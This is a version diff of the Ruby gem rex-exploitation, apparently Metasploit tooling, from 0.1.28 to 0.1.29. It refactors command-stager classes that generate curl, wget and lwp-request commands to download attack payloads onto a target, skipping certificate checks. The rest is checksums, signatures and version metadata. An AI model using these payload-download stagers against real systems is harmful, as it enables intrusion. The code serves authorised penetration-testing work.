rex-exploitation 0.1.28 → 0.1.29

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: a55ad0e209e6bfeaccd5e0b21a6fab185a3607f0563281402aa7b3f471770f26
4
- data.tar.gz: cab2892ed7e9a51590fd7e0214d0b5eb0d46c6b8ed090deb2f877e85e7d6b841
3
+ metadata.gz: e69e2bed1ac177b2484539a5a0230a220022f71076033698346c7c83fe1c2128
4
+ data.tar.gz: 73d249b1347e340fb3517d21f61b6936310ab5c761bdc4fa65cfcd1ea9a50bcd
5
5
  SHA512:
6
- metadata.gz: 04cd73b0220b13a6bfd2b67272a79ee8c86de698bacf7e36dfd404197d5bf27b3070fe9581de4e34eecdefcf4791c51681ef97d706d7a88ae52efd4f1637b7fd
7
- data.tar.gz: 9f2b81f309f8214333ab91dd6f475a6be9cf050c689df8daa9b044155e83406777d4a51c155ea0a205b25bce7f845041311817e167eb9d57dba12a7f34b58bbd
6
+ metadata.gz: c3c25edfd7431681b7b94bb8bef1d66b237c9e62354476c3aed8debc771efc816ab27f24e5c12ba4ac2d13f87ab1f7a52ec99c5f737bb30e970fdbf97ace0e33
7
+ data.tar.gz: 80291e0d18a9c84033a04b13d0d1cd512ffe039ae12fac397abbe2bfdf4a961ed16b347107e0d20939322e0808c62887d344be07efacd5de08d49a59129cbd99
checksums.yaml.gz.sig CHANGED
Binary file
@@ -24,11 +24,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
24
24
 
25
25
  def generate_cmds_payload(opts)
26
26
  cmds = []
27
+ uri = opts[:payload_uri]
27
28
 
28
29
  if opts[:ssl]
29
- cmds << "curl -kso #{@payload_path} #{opts[:payload_uri]}"
30
+ cmds << "curl -kso #{@payload_path} #{uri}"
30
31
  else
31
- cmds << "curl -so #{@payload_path} #{opts[:payload_uri]}"
32
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
33
+ cmds << "curl -so #{@payload_path} #{uri}"
32
34
  end
33
35
 
34
36
  cmds
@@ -23,7 +23,11 @@ class Rex::Exploitation::CmdStagerLwpRequest < Rex::Exploitation::CmdStagerBase
23
23
  end
24
24
 
25
25
  def generate_cmds_payload(opts)
26
- ["lwp-request -m GET #{opts[:payload_uri]} > #{@payload_path}"]
26
+ uri = opts[:payload_uri]
27
+ unless opts[:ssl]
28
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
29
+ end
30
+ ["lwp-request -m GET #{uri} > #{@payload_path}"]
27
31
  end
28
32
 
29
33
  def generate_cmds_decoder(opts)
@@ -24,12 +24,15 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
24
24
 
25
25
  def generate_cmds_payload(opts)
26
26
  cmds = []
27
+
28
+ uri = opts[:payload_uri]
27
29
  ncc = '--no-check-certificate'
28
30
 
29
31
  if opts[:ssl]
30
- cmds << "wget -qO #{@payload_path} #{ncc} #{opts[:payload_uri]}"
32
+ cmds << "wget -qO #{@payload_path} #{ncc} #{uri}"
31
33
  else
32
- cmds << "wget -qO #{@payload_path} #{opts[:payload_uri]}"
34
+ uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
35
+ cmds << "wget -qO #{@payload_path} #{uri}"
33
36
  end
34
37
 
35
38
  cmds
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.28"
3
+ VERSION = "0.1.29"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
@@ -1 +1 @@
1
- ^�������� ���������l�w�4.�ꪥ�ɠI7��V�3�<s��n��=�/�R:
1
+ 1:�#�������œҙl#��mbI��5��FF%�8�l7�D-)����gD}>��@����^C]>Z�OOcO����9w��_�N9�طe>G1���C* ��V UhG].�u��$0|zUգ] �U�1��¨�W������
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-exploitation
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.28
4
+ version: 0.1.29
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2021-09-16 00:00:00.000000000 Z
96
+ date: 2022-03-07 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
metadata.gz.sig CHANGED
Binary file